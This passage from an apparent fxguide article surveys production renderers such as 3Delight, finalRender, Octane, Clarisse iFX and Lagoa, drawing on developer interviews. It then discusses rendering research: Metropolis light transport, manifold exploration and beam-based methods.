    The notion of moving to new tools that are more physically accurate but also simpler from an artist point of view is a common desire in the industry. Image Engine does a lot of creature work, which often involves a lot of passes, baked textures and complex pipelines, so a high quality realistic but simpler process to lighting is very attractive. The less work in data management the more iterations and actual lighting the team can do. The team is in the middle of re-writing their shader library right now and re-examining some of those complex shader networks that have gone up in production over time. “For a lot of work and especially for background elements – hard surface props etc – we can move to using ready made shaders that have a lot of the physically plausible shading built in,” says Toogood, “and having that base will hopefully make their behaviors more predictable for the artists. But whether that will be run through ray tracing or not is something we will have to look at. We need to be flexible and quite responsive, we have to be a bit more clever than most in spending our computational budget, we are not a huge mega studio.”


    A final shot from the parkade collapse in Fast & Furious 6 (VFX by Image Engine).

    As Image Engine does a lot of character animation work it uses the SSS point cloud solution in 3Delight. They have found it very efficient to render – the only downside is the need to pre-bake the point cloud, which as with all such approaches makes render time tweaks hard as one needs to go back and re-bake the point cloud. “In terms of quality we are quite happy and our artists are very capable in manipulating the tools 3Delight offers to get good results,” says Toogood.

    Image Engine recently tried a hybrid HDR/IBL approach of capturing image probes on set, then projecting them onto geometry representing the scene and then using 3Delight’s point based indirect global illumination to project the light back onto the character, “so if a character is close to a wall they get bounce from the wall, but to get the artistic control our supervisors require we supplement that with normal spot lights to tune the shot,” Toogood explains.

    Image Engine works closely with the 3Delight team and they enjoy very good support and have a close working relationship. Unlike the web site of 3Delight which at the time of writing has not been updated for years, Image Engine gets the latest builds if need be and a very direct response from DNA Research. DNA seems to have a closely held group of users, and their twitter account is a graveyard. DNA will be at SIGGRAPH this year, and will soon be releasing new versions of its plug-ins and 3Delight Studio Pro.


    The Thing. VFX by Image Engine.

    3Delight Studio Pro’s current features include ray tracing, global illumination (including photon mapping, final gathering and high dynamic range lighting and rendering), realistic motion blur, depth of field, complete geometry support (including highly efficient rendering of hair and fur), programmable shaders and antialiased shadow maps. It is available for Windows, Linux and Mac OS X.

    The latest version of 3Delight (including both the Softimage and Maya plug-ins) has done a lot of work on ray tracing, with a full path tracing option with MIS and new materials. The next big release should see a lot of these new ray tracing tools available to all other users. 3Delight CTO Aghiles Kheffache told fxguide, in regards to the new version they will hopefully be showing at SIGGRAPH, that “we have a new multiple importance sampling framework that is easy to use. We have a new environment sampling algorithm that produces less noise than the competition. As an example, we don’t ask our users to blur environment maps in order to get nice sampling. The algorithm also extracts very nice shadows from environment maps. Our plug-ins now have the ability to do ‘IPR’,” he said, adding that in his opinion, “We claim that we have the fastest path tracer around. Especially when multiple bounces are involved.”

    Other 3Delight clients include Soho VFX, Rising Sun Pictures, ToonBox Entertainment, NHK, and Polygon Pictures (in Japan).


    2.11 finalRender – Cebas (GPU + CPU)

    finalRender was the first renderer to practically apply true global illumination rendering to large-scale vfx movie production, with the film 2012. The movie’s bigger scenes used finalRender’s advanced global illumination algorithms to render the vast photoreal disasters. The product is about to completely change, with a new approach and virtually all new code.

    An older render pre-4 from Makoto (Pasadena).

    There is a new version, finalRender 4 GPU, that will be launched at SIGGRAPH; as the name implies it will have GPU support, and it will be a normal upgrade for 3.5 users. “We have been working for a long time now,” says Edwin Braun, CEO at Cebas Visual Technology Inc, “the next step is really a new product, and with the changes in CUDA (5.5) – it will be a CUDA product – we have had to do so many new changes – it is really a new renderer – there is not much left from 3.5 – other than the name!”

    It is part of a wave of new GPU products, but significantly different as it also uses the CPU. There will now be “no difference between a GPU rendering and a CPU rendering and that is a hard thing to do,” says Braun, “we are getting really close to this goal we have set for ourselves.”

    The newest version is finalRender 4 GPU, which is a hardware accelerated (GPU) rendering approach with a rather unique balance between GPU and CPU. Unlike many other GPU-only renderers, finalRender 4 GPU “will always be faster” with newer hardware, even when upgrading the workstation alone and keeping the same GPU card. It will use all available rendering cores and not only one type of processor.

    Living room interior rendered in finalRender by Doni Sudarmawan.

    In contrast to other renderers, Cebas uses a hardware acceleration approach that will not favour CPU over GPU or vice versa. In fact, cebas’ trueHybrid technology will leverage the full potential of existing CPU cores as well as, simultaneously, using all existing GPU cores and memory. Maintaining full accessibility to the features and functionality of the core raytracing system, trueHybrid will not sacrifice quality for speed. Unlimited render elements (layers), volumetric shaders, complex blend materials and layered OpenEXR image file export, along with hundreds of third party plug-ins, are a few of the features made possible by finalRender 4 GPU that were otherwise unattainable with a GPU-only rendering system.

    finalRender 4 GPU provides some shading and rendering flexibility to GPU rendering. An advanced new material shading core gives finalRender the advantage of representing nearly every material effect in the form of a highly optimized native GPU shader. It supports the car shader, the skin shader, and many other shaders from 3ds Max. “If you have a Mental Ray scene and you use the Mental Ray architectural materials from Mental Ray, you can just render it with our GPU renderer,” says Braun.

    Rendering core and integration: finalRender 4 GPU is a fully integrated 3ds Max renderer with the key benefit of being compatible with existing 3ds Max workflows that usually include support of third party plug-ins. The following three rendering methods are all available with finalRender 4 GPU:

    • GPU Only Rendering Mode (full path traced rendering like Octane or V-Ray RT)
    • CPU Only Rendering Mode (like the old 3.5 used to run)
    • CPU + GPU (trueHybrid) Rendering Mode

    The last mode “uses the GPU for your CPU rendering.” What does that mean? If you render with Fume FX, which is a CPU plugin, hybrid mode will pass off some of its internal calculations to the GPU; in effect it is a GPU turbocharger for the CPU, even though the plugin itself is CPU-only. In tests this hybrid mode has shown 2x up to 5x speed improvements over the CPU alone. This hybrid mode is different from schemes where a CPU may help a GPU – the Cebas model works the other way around, so all CPU plugins are able to get GPU acceleration. “We can use all 3DStudio Max plugins as we were able to use them in our sw renderer, and the user will have no problem running 3D Max plugins and use their GPU if it is available,” explains Braun. This will also work well for farm rendering, where the farm machines may have no GPU cards.

    finalRender 4 GPU is aiming for the really high goal of providing a continuous GPU/CPU rendering workflow for 3ds Max users. trueHybrid is a novel approach: it was developed to allow co-operative hardware rendering by leveraging different types of processors at the same time in one workstation.

    finalRender’s memory optimization algorithms enable new Physically Based Microfacet rendering models for rendering various Blurry/Rough surface effects.


    src="http://www.youtube.com/embed/zVvfHCPK6yI?rel=0" height="480" width="640" allowfullscreen="" frameborder="0" style="margin: 0px; padding: 0px; border-width: 0px; font-weight: inherit; font-style: inherit; font-size: 14.3999996185303px; font-family: inherit; vertical-align: baseline;">

    Above: watch a Cebas Making of Reel.


    Global Illumination Methods

    finalRender offers the benefit of multiple Global Illumination engines for artists to choose from. The newest GI rendering method offers an unbiased, physically accurate path tracing approach, with fast GPU based Global Illumination.

    Other options or methods include:

    • Irradiance Caching
    • Unbiased Rendering
    • Light Cache Rendering

    Core Render Qualities (Realtime and Non-Realtime):

    • Newly developed: Content Aware Sampling (CAS)
    • Physically Based Wavelength / Spectral Light Transport
    • Biased & Unbiased Rendering incl. Direct Lighting / Ambient Occlusion support
    • Full physically based IES light support
    • Physically Based material shading model
    • Highly optimized Geometry Instancing for GPU and CPU

    One of the issues in GPU renders is noise or grain. Although Braun can’t discuss details, he hints at a new sampling method that will smooth out such renders and produce more even and smoother results. To do this he will only hint that they are borrowing from other technologies; hopefully at SIGGRAPH one can find out more about these sampling techniques, which he claims do not involve any MIS or importance sampling.

    Maik (Germany)

    It is worth noting Cebas also produces Thinking Particles, one of the industry’s key tools for fire, procedural particles and fx animation work. Unfortunately 3ds Max does not allow Thinking Particles to work more closely with finalRender, except via a backdoor. The plugin interface in 3ds Max is very old, and it means Thinking Particles can only do some of the things it could otherwise do with finalRender, as Autodesk does not allow other products to work together beyond the architecture the plugins must normally follow.


    Although Max is the main user group, finalRender is also supported in Maya, used at vendors such as Walt Disney Studios, but the Maya code base is different and the new GPU/CPU version 4 will come to Maya later. There is more flexibility there, so that version may end up with more features than the Max version. The C4D version is now more or less discontinued.


    2.12 Octane – OTOY

    Octane is one of three new renderers that we have included in the round up. Each is approaching rendering from a new point of view and each has the promise of being impactful in its own right. Octane is a powerful GPU render solution that works using both local and cloud based GPUs.

    Below is a Sony spot animated in 3DS Max and fully rendered on Octane.

    src="http://www.youtube.com/embed/4Qxc_RdJ0Yw" height="360" width="640" allowfullscreen="" frameborder="0" style="margin: 0px; padding: 0px; border-width: 0px; font-weight: inherit; font-style: inherit; font-size: 14.3999996185303px; font-family: inherit; vertical-align: baseline;">

    fxguide wrote about the product when it launched over a year ago, and it was heavily featured at the last Nvidia GPU Technology Conference. At that conference it was announced that it would be used by Josh Trank, director of The Fantastic Four, for his in-house vfx team. Trank appeared on stage during the keynote speech of Nvidia chief executive Jen-Hsun Huang at the GPU Technology Conference in San José, touting how his special effects team will be able to tap cloud rendering technology from OTOY to create the movie at a much lower cost.

    Octane Render from Lightwave.

    As we pointed out when it came out of beta, Octane Render is a real-time 3D unbiased rendering application that was started by the New Zealand company Refractive Software. OTOY is now developing the program. It is the first commercially available unbiased renderer to work exclusively on the GPU, and runs exclusively on Nvidia’s CUDA technology. OTOY sells Octane as a stand alone renderer as well as a plugin to popular 3D applications such as Max and Maya. The company has strong links to cloud computing and graphics research. OTOY also owns LightStage, LLC in Burbank, which did the facial scanning for The Avengers, among other films, and Paul Debevec is their “chief scientific consultant”. They also have a special relationship with Autodesk, who are an investor, and its tools can be integrated as a plugin for almost all the major 3D art tools on the market today.

    As we said then – “Clearly these guys know what they are doing.”

    The base Octane is still very young, but it has such strong partners in Nvidia and Autodesk alone that it demands attention. The primary appeal of Octane is its promise to bridge the divide between GPUs and high end production rendering.

    God rays using Octane with transmissive fog.

    The company also has Brigade, which is not yet a shipping product but aims to deliver GPU ray tracing at game rendering speeds. Brigade is a different code base from Octane, and the two products are sharing algorithms and innovations moving forward. It is one of the leading realtime path tracing, game-speed rendering products, and tests have shown exceptional rendering speed, but at the cost of classic ray tracing noise which, while fine in real time, would naturally need to be rendered longer in a production pipeline.

    The whole area of real time ray tracing is about to have another major boost from the SIGGRAPH 2013 Real-Time Live! event. Once again this year at SIGGRAPH there is a special session showcasing the latest research, and in particular games development, for realtime rendering.

    Real-Time Live! is perhaps the world’s premier showcase for the latest trends and techniques for pushing the boundaries of interactive rendering. As part of the Computer Animation Festival, an international jury selects submissions from a diverse array of industries to create a fast-paced, 90-minute show of cutting-edge, aesthetically stimulating real-time work. Each live presentation lasts less than 10 minutes, and is presented by the artists and engineers who produced the work. Last year was remarkable for its range of sessions, which included realtime SSS and facial lighting. While it features game engine rendering and art pieces, it also very clearly highlights the massive advances in general realtime rendering that are outside the scope of this article.


    2.13 Clarisse iFX – Isotropix

    Clarisse iFX is included as one of our three new renderers as it seeks not to fit into a pipeline in the traditional sense. The team led by founder Sam Assadian wants to merge the product into a pipeline not as an end renderer but starting further back up the pipeline. While solving the render equation quickly is important, it is changing the workflow itself that interests him.

    Internal Clarisse demo image (using 75 million unique, non-instanced polygon assets, multiplied to 8 billion in Clarisse).

    Clarisse iFX is a new style of high-end 2D/3D animation software. Isotropix is a privately owned French company and has been working on Clarisse iFX for several years now. It has been designed to simplify the workflow of professional CG artists, letting them work directly on final images while alleviating the complexity of 3D creation and of rendering out many separate layers and passes. Clarisse iFX is a fusion of compositing software, a 3D rendering engine and an animation package. Its workflow has been designed from scratch to be ‘image-centric’ so that artists can work constantly while visualizing their final image with full effects on. It wants artists to see the final image as much and as constantly as possible.

    At its core, Clarisse iFX has a renderer that is primed and ready to start final renderings within milliseconds of your finger touching something that requires a re-render. It provides a lot more, but this central mantra means that the program feels remarkably fast, far faster than it seems it should be given that the program is rendering on CPUs and not GPUs.

    Screenshot of Cube Creative’s assets from the Kaeloo French TV show, featuring characters rendered with 3D DOF and motion blur.

    The renderer is different from some listed here in that it is very tied to the front end, but unlike native renderers of animation and modelling packages, Clarisse iFX can’t model. It is designed to import and do some animation, although not character animation.

    Since launching a year ago it has been developing new versions of the software but also working extremely closely with several key players to integrate Clarisse into other OEM products. At SIGGRAPH 2013 it will launch the new v 1.5 with major improvements, but one senses the real action will be in these OEM deals.

    The interest from other companies comes from the lightning fast render times and the data management that focuses not just on fast rendering but on changing the relationship between the renderer and the rest of the modeling and animation software. Company founder Sam Assadian explains this conceptually by drawing a picture of the current industry workflow as having “dinosaur, 20 year old code passing along this tiny wire to modern rendering engine – that just does not work.”

    Final shot from Kaeloo.

    What this means in practical terms, according to Assadian, is that when production shots are ready to be handed over to rendering, just loading the files can take, say, 45 minutes, and then it is even longer before the first renders appear. The pipeline may then render efficiently, but this lack of integration and legacy code from generalist old software means the artist has no sense of immediate rendering on large scenes.

    For Clarisse iFX he claims the same production shots in their pipeline would open almost straight away and then start rendering almost immediately – “we cut the wire”. His approach is therefore to tackle not just fast rendering but to integrate the renderer further up the pipeline, so the traditional divides are gone, and so too are the vast load times and poor interactivity.

    The actual renderer is a single path tracing solution, but after the new v1.5 to be launched at SIGGRAPH they may introduce irradiance caching. This might seem like an odd move, but the speed of irradiance caching is just too compelling for Assadian to ignore. He feels that for some jobs, especially still frames of vast complexity, many lighting TDs just want the fastest solution, and he is keen to provide whatever it takes to render vast scenes quickly. Irradiance caching had actually been mentioned a year ago when we wrote about the launch of the product, and at that time it was thought to be in beta. As a company they do not follow a normal release cycle with major versioning; one gathers that at this early stage, custom builds and close integration with their small but important user base do not require a normal major/minor release schedule. While the company has a range of these key OEM customers, there are few customers using the product in day to day production. The French studio Ellipsanimé (also known as Le Studio Ellipse, or Ellipse Programme) is one exception, using the software for episodic television production.

    Clarisse screenshot.

    The system is still extremely young; it lacks some features such as caustics and deep color/deep compositing, but its multi-threaded rendering approach is fast. The company is keen to embrace open source, and it is especially keen to embrace the new Alembic 1.5, as it finds the current Alembic file format not well suited to its multi-threaded approach, which slows the iFX system down. The current Alembic is supported, but Assadian expects big improvements with the new 1.5 release, and he has seen 20x improvements.

    Similarly they are exploring OpenVDB for post 1.5 and seem certain to adopt it for volumetric work. The shader and material definitions do not currently support OSL, but Assadian described Open Shading Language as “very sexy” and again something they are very keen to explore later this year.

    The company has attracted a lot of early attention for its outrageously fast rendering pipeline (load, interact, render). It has already been working with companies such as ILM and Double Negative. The next six months seem critical: if some of these third party companies integrate the product then it could really shake up the industry; if not, its new approach may fail to gain traction and it may need to rethink its ‘wire cutting’ approach and work more like a traditional renderer. But this second option is clearly not of much interest to the team, and to founder Sam Assadian in particular. The product is worth checking out at SIGGRAPH 2013 if you are attending; they will have a booth.


    2.14 Lagoa

    The last of the new renderers is Lagoa. But unlike the others, Lagoa is not GPU based; it is cloud computing only.

    Rendered in Lagoa.

    It uses a variety of approaches based on the materials, which the company calls Multi-optics. For example, there is a specific approach for hair – optimized for hair – and a different approach for sub-surface scattering, which is a progressive non-point based solution, again optimized for SSS.

    SSS test rendered for fxguide by Thiago Costa.

    It is a web-based renderer. For almost all other products, aiming to be a web tool would mean being anything but a production renderer; most such products fall somewhere between a toy and a light weight educational tool. What makes Lagoa stand out is that the actual renderer is technically cutting edge and has real R&D innovation feeding very high quality results.

    The company aims to produce production quality rendering not only in a render farm free pipeline but on a local render free desktop machine. With modern internet connections Lagoa aims to be taken very seriously in the high end render market, and in so doing change the way people structure companies.

    The Lagoa SSS is brute force (fully ray traced) and includes both single and multiple scattering. Consequently, the method does not require any precomputation and works for anything ranging from thin volumetric slabs to an army of volumes with highly detailed surface structure. “The only assumptions we make so far is a specific BRDF at the interface: glossy diffuse (‘Rough Volumetric’) or perfectly smooth (‘Smooth Volumetric’). Moreover, light sources inside a volume are not supported. We also take advantage of the path space analysis discussed below (which means that, in the end, we are not fully unbiased),” explains co-founder Arno Zinke.

    The ray tracer is uni-directional, but the company does not like working inside labels such as ‘biased’ or ‘unbiased’. “Generally, I think the biased vs. unbiased battle is over – consistency is the key,” says Zinke. “We are currently exploring the use of other methods (including fully bidirectional path tracing and a novel progressive consistent method) but the current implementation is uni-directional. On top there is a path space analysis to reduce ‘fireflies’. The method goes beyond standard approaches, like clamping or BRDF smoothing, and is less aggressive (more selective) when dealing with hard-to-sample paths.”

    Lagoa Hair Render

    There is extensive use of importance sampling, on materials and light sources and IBL. “We use (multiple) importance (re)sampling for lights (also in spectral domain, when having for example spectrally varying scattering coefficients in case of SSS), image reconstruction filter, phase functions and all other materials,” adds Zinke.

    The system is expanding with more advanced shaders for plastics and other materials, as part of an update to be released at SIGGRAPH. Included in this will be a new texture editing pipeline, and light projectors are also being added.

    One of the great additional services the company offers is to have the exact materials (a 5×5 patch) actually scanned and a real BRDF is then used in the renderer. “Besides classical BSDF and volumes we also support the direct rendering of particle scattering functions, BCSDFs (Bidirectional Curve Scattering Distribution Functions) and BTFs (Bidirectional Texture Functions),” says Zinke.

    The scanning service means “we have a BRDF per pixel,” says Thiago Costa, co-founder. This concept seemed odd – why is it not a BSDF of the material? We asked Arno Zinke to explain: “So when talking about a BRDF per pixel Thiago was referring to BTF, which can be seen as a ‘texture of BRDFs’. A BTF can be measured (the standard case) and simulated. Contrary to conventional spatially varying BRDFs, a BTF may also include parallax, local shadowing and local SSS effects.”

    The company’s online presentation may be deceptive: this is not a toy renderer. While the product is streamlined for ease of use it is also able to produce very complex imagery. “As for polycount, we have tested scenes up to a few hundred million (non-instanced) polygons without any problems so far,” says Zinke. “This said, our scene layout has been optimized for interactivity/dynamic scene updates, not memory efficiency. We have no magic bullet for sampling complicated light paths.”

    The aim is to provide very complex tools as part of a radical rethink about the very nature of third party renderers, which includes a very different pricing model.

    The company is still young; right now it does not support many open source initiatives, so it does not support deep data, OSL, Alembic, OpenVDB or Cortex, but it is currently trying to support OpenSubdiv from Pixar. Interestingly, while the company does not support OpenVDB, its SSS could allow that in the future if the product moved in that direction. According to Zinke, “I’m following Ken Museth’s research since many years and find OpenVDB very interesting. However, since our focus is on design, supporting volumetric effects like smoke or fog is not having highest priority. As our current SSS implementation is essentially based on volume rendering an extension would be relatively straightforward though.”

    The company has its own compressed geometry format, which some clients use if they want to compress data before uploading to the cloud/farm/Lagoa environment. It normally compresses data by a factor of 10, depending on the geometry. Everything that gets loaded into Lagoa is converted into this format anyway, so for large projects it makes sense to compress before upload. Whatever the source format, SolidWorks or any of the 20 different file formats that the product supports, it can be converted before or after upload, but everything that is rendered is in this internal format. “We use a proprietary format for compression of meshes and similar data that uses several high and low-level techniques for drastically reducing memory footprint. All incoming meshes get transcoded into this internal format,” says Zinke.

    The company is also working with other companies to allow them to OEM the Lagoa renderer into a third party application or mobile platform.


    3. Future Directions

    3.1 Metropolis and Manifold
    3.2 A Whole New Approach

    3.1 Metropolis and Manifold

    3.1.1 Metropolis Light Transport

    The central performance bottleneck in path tracing is the complex geometrical calculation of casting a ray. Importance sampling, as mentioned above, allows fewer rays through the scene while still converging correctly to the outgoing luminance at the surface point. Metropolis light transport (MLT) is another approach (introduced in Eric Veach’s 1997 Ph.D thesis). In their 1997 SIGGRAPH paper, Veach and Leonidas J. Guibas described an application of a variant of the Monte Carlo method called the Metropolis-Hastings algorithm.

    Wikipedia has a great definition: The procedure constructs paths from the eye to a light source using bidirectional path tracing, then constructs slight modifications to the path. Some careful statistical calculation (the Metropolis algorithm) is used to compute the appropriate distribution of brightness over the image. This procedure has the advantage, relative to bidirectional path tracing, that once a path has been found from light to eye, the algorithm can then explore nearby paths; thus difficult-to-find light paths can be explored more thoroughly with the same number of simulated photons. In short, the algorithm generates a path and stores the path’s ‘nodes’ in a list. It can then modify the path by adding extra nodes and creating a new light path. While creating this new path, the algorithm decides how many new ‘nodes’ to add and whether or not these new nodes will actually create a new path.
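
    For reference, the Metropolis-Hastings step that underlies MLT can be written compactly (this is the textbook formulation, not pseudo-code from any particular renderer): a proposed mutation from the current path x to a new path y is accepted with probability

        $$ a(x \to y) = \min\!\left(1,\ \frac{f(y)\, T(y \to x)}{f(x)\, T(x \to y)}\right) $$

    where f is the image contribution of a path and T is the probability of proposing a given mutation. Accepted paths are kept and mutated again, which is exactly the ‘remembering’ of successful light paths described above.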

    Arion 2 comparison.

    The result of MLT can be an even lower-noise image with fewer samples. This algorithm was created in order to get faster convergence in scenes in which the light must pass through odd corridors or small holes in order to reach the part of the scene that the camera is viewing. The classic example is bright light outside a door coming through a small slot or keyhole. In path tracing this would be hard to solve efficiently, but the bi-directional MLT system of nodally mapping the rays solves this well.

    It has also shown promise in correctly rendering pathological situations that defeat other renderers such as rendering accurate caustics. Instead of generating random paths, new sampling paths are created as slight mutations of existing ones. In this sense, the algorithm “remembers” the successful paths from light sources to the camera.

    MLT is an interesting topic. We polled almost all the companies mentioned in this story on MLT, and the reactions ranged from ‘great, but too complex/slow’, to senior researchers who wanted to implement it, to a rare few like Maxwell who already have a partial (hybrid) implementation. It is by no means seen by all as the natural direction to go in, but one gets the impression that if a workable solution could be found, everyone would at least consider exploring it.

    One company that does support MLT is RandomControl’s Arion 2.

    Arion is a hybrid-accelerated and physically-based production render engine. It takes a parallel GPU+CPU approach: Arion uses all the GPUs and all the CPUs in the system simultaneously. Additionally, Arion can use all the GPUs and all the CPUs in all the other computers on the network, forming a cluster for massive distribution of animation frames.

    Arion 2 can handle most of the rendering effects which are considered standard these days, such as displacements, instancing, motion blur, and more. And beyond the current feature list of Arion, it is a Metropolis Light Transport renderer that can run on the GPU.

    This is not an MLT lookalike or “simili-MLT amputated from its glory to run on a GPU, it’s the true, fully-featured Metropolis algorithm”, claims the company.

    Although MLT can be used on any kind of render, it has a great use in optical and lighting simulations. The issue, however, remains render time per frame. While very accurate, the render above was completed in a few hours on two GeForce GTX 580s. Note that the blue beam seen in the total internal reflection of the left-most prism, for example, is a very hard case for most renderers.

    As mentioned above there are very few Metropolis ray tracing solutions. Arion 2 is one, Maxwell is a hybrid, but why are there not more?

    We asked Marcos Fajardo, founder of Arnold developer Solid Angle, who had already told us that Veach’s original PhD is so pivotal he re-reads it every couple of years. So why isn’t Arnold using MLT? Fajardo points out that the theory was based on work done in the 1950s and 60s. “The reason why it is so difficult to implement in a renderer is that the theory itself is really complicated and it also changes the aspect of the noise you get in images. It works best if the renderer already has a bi-directional path tracing algorithm. In the case of Arnold it is a uni-directional path tracer.”

    Arnold fires rays from the camera into the scene, not from both the camera and the lights. “Bi-directional path tracing is really tricky to get right and to make it work well in a production environment; for example, programmable shaders don’t work well with MLT.” Shaders in MLT need to preserve the principle of equivalence: the shader has to give the same answer whether it is evaluated from the light’s direction or from the camera’s.
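
    That ‘principle of equivalence’ is usually formalized as BRDF reciprocity (this is the standard textbook statement, offered here for context rather than as a quote from Fajardo):

        $$ f_r(\mathbf{x},\ \omega_i \to \omega_o) \;=\; f_r(\mathbf{x},\ \omega_o \to \omega_i) $$

    i.e. swapping the incoming and outgoing directions at a surface point must not change the shader’s value. Many production shaders break this symmetry with view-dependent tricks, which is one reason bidirectional methods and MLT struggle with them.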

    Maxwell has some MLT but it does not support large programmable production shaders, and so Fajardo feels it will be some time before production renderers could even possibly go this way. Most production shaders do not respect the Principle of Equivalence.

    The team at Lagoa have explored MLT. “We considered using MLT. I agree that, in its pure form, the unavoidable impact on rendering speed and the bad stratification of samples etc. are serious shortcomings. However, for certain light paths Metropolis sampling (or similar) is the only way to go. As said we are actively working on several methods for improving speed and quality. For us the perfect method has to be practical: interactive/progressive, must scale, has to allow for dynamic scene updates and has to deliver consistent results,” explained co-founder of Lagoa Arno Zinke.

    3.1.2. Manifold Exploration

    Beyond MLT is an even more accurate model, and one that requires no special geometry. It is Manifold Exploration Path Tracing (MEPT) and it could be a major advance in super accurate rendering. “Veach’s work (referring to the 1997 thesis) was the last major contribution to path tracing until last year and the Manifold Exploration,” explained Juan Cañada, the Head of Maxwell Render Technology.

    It is a long-standing problem in unbiased Monte Carlo methods for rendering that certain difficult types of light transport paths, particularly those involving viewing and illumination along paths containing specular or glossy surfaces such as rough glass, some metals or plastics, cause unusably slow convergence. In their 2012 SIGGRAPH paper Manifold Exploration, Wenzel Jakob and Steve Marschner from Cornell University proposed a new way of handling specular paths in rendering. It is based on the idea that sets of paths contributing to the image naturally form ‘manifolds’ in path space, which can be explored locally by a simple equation-solving iteration. The resulting rendering algorithms handle specular, near-specular, glossy, and diffuse surface interactions as well as isotropic or highly anisotropic volume scattering interactions, all using the same fundamental algorithm. They showed their implementation on a range of challenging scenes and used only geometric information that is already generally available in ray tracing renderers.

    Certain classes of light paths have traditionally been a source of difficulty in conducting Monte Carlo simulations of light transport. A well-known example is specular-diffuse-specular paths, such as a tabletop seen through a drinking glass sitting on it, a bottle containing shampoo or other translucent liquid, or a shop window viewed and illuminated from outside. Even in scenes where these paths do not cause dramatic lighting effects, their presence can lead to unusably slow convergence in renderers that attempt to account for all transport paths. (SIGGRAPH 2012)

    To understand its approach it is good to summarize this article and the advances it has hopefully highlighted:

    Simulating light transport has been a major effort in computer graphics for over 25 years, beginning with the introduction of Monte Carlo methods for ray tracing (Cook et al., Pixar, 1984), followed by Kajiya’s formulation of global illumination in terms of the Rendering Equation (Kajiya 1986), which established the field of Monte Carlo global illumination as stated above.
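
    For reference, the rendering equation Kajiya introduced can be written in its usual hemispherical form (standard notation, added here for context):

        $$ L_o(\mathbf{x}, \omega_o) = L_e(\mathbf{x}, \omega_o) + \int_{\Omega} f_r(\mathbf{x}, \omega_i \to \omega_o)\, L_i(\mathbf{x}, \omega_i)\, (\omega_i \cdot \mathbf{n})\, d\omega_i $$

    The outgoing radiance at a point is its emission plus the integral of incoming radiance weighted by the BRDF and the cosine term; every algorithm discussed below is ultimately a different strategy for estimating that integral.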

    Unbiased sampling methods, in which each pixel in the image is a random variable with an expected value exactly equal to the solution of the Rendering Equation, started with Kajiya’s original path tracing method and continued with bidirectional path tracing, in which light transport paths can be constructed partly from the light and partly from the eye, and the seminal Metropolis Light Transport (Veach 1997) algorithm. This is a paper so important that people still regularly return to it and refer to it today. “He provided a very robust mathematical framework that explained the algorithms (bi-directional path tracing and MLT) and explained them very well, but it was theoretical – when you implement your own path tracer you quickly find the evil is indeed in the detail!” comments Cañada.

    Various two-pass methods use a particle-tracing pass that sends energy out from light sources in the form of “photons” that are traced through the scene and stored in a spatial data structure. The second pass then renders the image using ray tracing, making use of the stored particles to estimate illumination by density estimation. This two pass approach is great on noise, but it requires a pre-processing pass, and while there is a move away from point based solutions, it is still a valid and widely used option.

    Photon mapping and other two-pass methods are characterized by storing an approximate representation of some part of the illumination in the scene, which requires assumptions about the smoothness of illumination distributions. “On one hand, this enables rendering of some modes of transport that are difficult for unbiased methods, since the exact paths by which light travels do not need to be found; separate paths from the eye and light that end at nearby points suffice under assumptions of smoothness. However, this smoothness assumption inherently leads to smoothing errors in images: the results are biased, in the Monte Carlo sense.” (Jakob, SIGGRAPH 2012 )

    Glossy-to-glossy transport, without a sufficiently diffuse surface on which to store photons, is challenging to handle with photon maps, since large numbers of photons must be collected to adequately sample position-direction space. Some photon mapping variants avoid this by treating glossy materials as specular, but this means that the resulting method increasingly resembles path tracing as the number of rough surfaces in the input scene grows.

    Manifold exploration is a technique for integrating the contributions of sets of specular or near-specular illumination paths to the rendered image of a scene. The general approach applies to surfaces and volumes, and to ideal and non-ideal (glossy) specular surfaces.
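
    A rough sketch of the core idea, paraphrasing the paper rather than quoting it: at each specular vertex x_i of a path, the projection of a generalized half-direction vector onto the surface tangent plane is required to vanish,

        $$ c_i(x_{i-1}, x_i, x_{i+1}) \;=\; T(x_i)^{\top}\, h(x_{i-1}, x_i, x_{i+1}) \;=\; 0 $$

    so the set of admissible specular chains forms a lower-dimensional manifold in path space, and a Newton-style solver walks along that manifold to find nearby valid paths instead of hoping to hit them by random sampling.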

    As you can see in the example above, the results are even more accurate and have less noise than MLT. The subtle caustic refractions are captured in the MEPT render but lost in the MLT one.

    3.2 A whole new approach

    Wojciech Jarosz is a Research Scientist at Disney Research Zürich heading the rendering group, and an adjunct lecturer at ETH Zürich. The Perils of Evolutionary Rendering Research: Beyond the Point Sample, the keynote by Jarosz at EGSR 2013, argued that the way “we approach many difficult problems in rendering today is fundamentally flawed.” Jarosz put forward the case that “we typically start with an existing, proven solution to a problem (e.g., global illumination on surfaces), and try to extend the solution to handle more complex scenarios (e.g., participating media rendering).”

    Image from a paper by Derek Nowrouzezahrai, Jared Johnson, Andrew Selle, Dylan Lacewell, Michael Kaschalk, Wojciech Jarosz (see full credit in footnote below).

    While he feels that this “evolutionary approach is often very intuitive,” it can lead to algorithms that are significantly limited by their evolutionary legacy: “To make major progress, we may have to rethink (and perhaps even reverse) this evolutionary approach.” He claimed that “a revolutionary strategy, one that starts with the more difficult, more general, and higher-dimensional problem – though initially more daunting, can lead to significantly better solutions. These case studies all reveal that moving beyond the ubiquitous point sample may be necessary for major progress.”

    A good example of this is the point based solutions discussed in this article. Jarosz points out that by taking the original idea of point samples as a basis for research, there is a progression of improvement, but always based on points. While there is a rival approach in the fully ray traced approach, recently someone stopped and wondered: why points? Why not beams? Since then there has been a series of complete rethinks of many of the point methods, such as volumetric illumination, SSS and others, starting from a whole new place of assuming beams rather than points, in effect replacing the concept of a ‘point cloud’ with ‘beam clouds’.

    Jarosz’s central point is not just to promote beam approaches; rather he uses this as an example of coming at a problem from an entirely new direction. In his EGSR talk last month he offered several examples, from motion blur rendering to SSS, of how a completely new revolution in approach is often advantageous over iterative evolution. In other words, to get somewhere new, don’t start where we are now; start from a new jumping-off point. Certainly the real world examples benefited from this ‘new approach’ thinking, and we will have a more in-depth fxguide article on his talk published here soon.

    Jarosz does note, however, that he thinks researchers should rely on the evolutionary approach, but should have revolutions every once in a while to re-examine whether “we are doing things the right way.” But, he says, it’s incredibly hard to simply make a revolutionary step without relying on the hard evolutionary steps taken by others.

    One person who heard Wojciech Jarosz’s keynote talk first hand at EGSR was Marcos Fajardo from Solid Angle. “It was a really inspired talk, his talk was amazing; what he is trying to say is we can get stuck in seeing things a certain way, and maybe we should sometimes try and take a broader view of things, and then we can see more generalization of techniques. His main point is very valid, but his examples are quite specific to the work he has done at Disney,” referring to the beam based vs point based approaches.

    Photon points vs photon beams – an example of a different approach, and not just a refinement of the current approach.

